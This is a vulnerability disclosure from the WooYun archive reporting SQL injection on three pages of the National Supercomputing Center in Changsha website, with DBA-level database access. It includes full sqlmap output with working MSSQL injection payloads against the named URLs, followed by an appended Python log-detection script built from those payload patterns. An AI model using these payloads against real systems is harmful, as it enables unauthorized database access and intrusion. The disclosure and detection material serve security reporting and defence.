WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2016-01-17: Details reported to the vendor; awaiting vendor processing
2016-01-18: Vendor has confirmed; details disclosed to the vendor only
2016-01-28: Details disclosed to core white hats and experts in the relevant field
2016-02-07: Details disclosed to regular white hats
2016-02-17: Details disclosed to intern white hats
2016-02-27: Details disclosed to the public
Multiple vulnerabilities at a certain National Supercomputing Center (getshell possible) (intranet roaming possible)
The National Supercomputing Center in Changsha was approved by the Ministry of Science and Technology in October 2010, becoming the third national-level supercomputing center approved for construction after Tianjin and Shenzhen. On 28 November 2010 the National Supercomputing Center in Changsha, with "Tianhe-1" as its computing equipment, officially broke ground at Hunan University. On 4 November 2014 the center officially went into operation at Hunan University. The "National Supercomputing Center in Changsha" is a major informatization project approved by the Ministry of Science and Technology. It is sited on the Hunan University campus, uses the "Tianhe-1" high-performance computer of the National University of Defense Technology, is planned for a computing capacity of 1000 trillion operations per second, and has a total investment of 720 million yuan.

I happened to browse to the National Supercomputing Center in Changsha, http://nscc.hnu.edu.cn/, and tested it. The following three locations are SQL-injectable:
http://nscc.hnu.edu.cn/Article_NoticeList.aspx?id=13
http://nscc.hnu.edu.cn/Article_NewsList.aspx?id=14
http://nscc.hnu.edu.cn/Article_ApplyList.aspx?id=4

[1] sqlmap screenshot:
[2] The database user has DBA privileges, so operating-system commands can be executed directly; the server sits on the intranet.
[3] Database information:
Apparently a project information database.
Not pursued any further.
Full sqlmap run:
[18:09:00] [INFO] testing connection to the target URL
[18:09:01] [INFO] testing if the target URL is stable. This can take a couple of seconds
[18:09:02] [INFO] target URL is stable
[18:09:02] [INFO] testing if GET parameter 'id' is dynamic
[18:09:02] [INFO] confirming that GET parameter 'id' is dynamic
[18:09:03] [INFO] GET parameter 'id' is dynamic
[18:09:03] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'Microsoft SQL Server')
[18:09:03] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n]
[18:09:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:09:31] [WARNING] reflective value(s) found and filtering out
[18:09:32] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[18:09:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:09:32] [INFO] GET parameter 'id' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[18:09:32] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:09:33] [INFO] GET parameter 'id' is 'Microsoft SQL Server/Sybase inline queries' injectable
[18:09:33] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[18:09:33] [WARNING] time-based comparison requires larger statistical model, please wait..................
[18:09:48] [INFO] GET parameter 'id' seems to be 'Microsoft SQL Server/Sybase stacked queries' injectable
[18:09:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:09:59] [INFO] GET parameter 'id' seems to be 'Microsoft SQL Server/Sybase time-based blind' injectable
[18:09:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[18:09:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[18:10:04] [INFO] target URL appears to be UNION injectable with 11 columns
[18:10:06] [WARNING] combined UNION/error-based SQL injection case found on column 2. sqlmap will try to find another column with better characteristics
[18:10:07] [WARNING] combined UNION/error-based SQL injection case found on column 1. sqlmap will try to find another column with better characteristics
[18:10:07] [WARNING] combined UNION/error-based SQL injection case found on column 11. sqlmap will try to find another column with better characteristics
[18:10:08] [WARNING] combined UNION/error-based SQL injection case found on column 9. sqlmap will try to find another column with better characteristics
[18:10:08] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=14 AND 5278=5278

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=14 AND 2616=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (2616=2616) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(112)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=14 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)+CHAR(83)+CHAR(65)+CHAR(102)+CHAR(99)+CHAR(108)+CHAR(104)+CHAR(80)+CHAR(110)+CHAR(74)+CHAR(112)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(112)+CHAR(113),NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=14 ; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=14 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (3942=3942) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(112)+CHAR(113))
---
[18:10:23] [INFO] testing Microsoft SQL Server
[18:10:24] [INFO] confirming Microsoft SQL Server
[18:10:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
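As an added example that is not part of the original report, the script below turns the payload shapes visible in the sqlmap output above (boolean `AND n=n`, error-based `CONVERT(INT,(SELECT ...`, `UNION ALL SELECT NULL`, `WAITFOR DELAY`, and the `CHAR()+CHAR()` string building) into log signatures, so a defender can spot the same probing against an `id` parameter in IIS access logs. The log lines and the signature names are constructed for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Regexes for the payload shapes sqlmap reported against the 'id' parameter above
# (boolean-based, error-based CONVERT(INT,...), UNION NULL columns, WAITFOR DELAY,
# and the CHAR()+CHAR() concatenation all of its MSSQL payloads share).
SIGNATURES = {
    "boolean-blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based":   re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT\b", re.I),
    "union":         re.compile(r"\bUNION\s+ALL\s+SELECT\s+NULL\b", re.I),
    "stacked/time":  re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "char-concat":   re.compile(r"(?:CHAR\(\d+\)\+){3,}", re.I),
}

# Constructed IIS W3C-style lines (date time cs-uri-stem cs-uri-query sc-status);
# not real server logs, the query strings mirror the payloads in the sqlmap output.
SAMPLE_LOG = """\
2016-01-17 18:09:31 /Article_NewsList.aspx id=14%20AND%205278%3D5278 200
2016-01-17 18:09:32 /Article_NewsList.aspx id=14%20AND%202616%3DCONVERT(INT,(SELECT%20CHAR(113)%2BCHAR(106)%2BCHAR(118)%2BCHAR(112)%2BCHAR(113))) 500
2016-01-17 18:10:04 /Article_NewsList.aspx id=14%20UNION%20ALL%20SELECT%20NULL,NULL,NULL-- 200
2016-01-17 18:10:10 /Article_NewsList.aspx id=14%20;%20WAITFOR%20DELAY%20'0:0:5'-- 200
2016-01-17 18:10:20 /Article_NewsList.aspx id=14 200
2016-01-17 18:10:21 /Article_NoticeList.aspx id=13 200
"""


def scan_log(text):
    """Return (time, uri-stem, [matched signature names]) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or line.startswith("#"):   # skip short and comment lines
            continue
        _date, clock, stem, query, _status = parts[:5]
        decoded = unquote_plus(query)                 # IIS logs URL-encode the query
        matched = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
        if matched:
            hits.append((clock, stem, matched))
    return hits


def summarize(hits):
    """Map each URI stem to the set of technique classes seen against it; several
    classes on one page within a short window is the footprint of a full sqlmap run."""
    per_stem = {}
    for _clock, stem, matched in hits:
        per_stem.setdefault(stem, set()).update(matched)
    return per_stem


if __name__ == "__main__":
    for clock, stem, matched in scan_log(SAMPLE_LOG):
        print(clock, stem, ", ".join(matched))
    print(summarize(scan_log(SAMPLE_LOG)))
```

The `id=14` and `id=13` baseline requests produce no hit, so the summary only lists the page that was actually probed.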
Severity: Medium
Vulnerability Rank: 5
Confirmed at: 2016-01-18 09:02
Vendor response: Confirmed; will be fixed as soon as possible
Vendor evaluation: None yet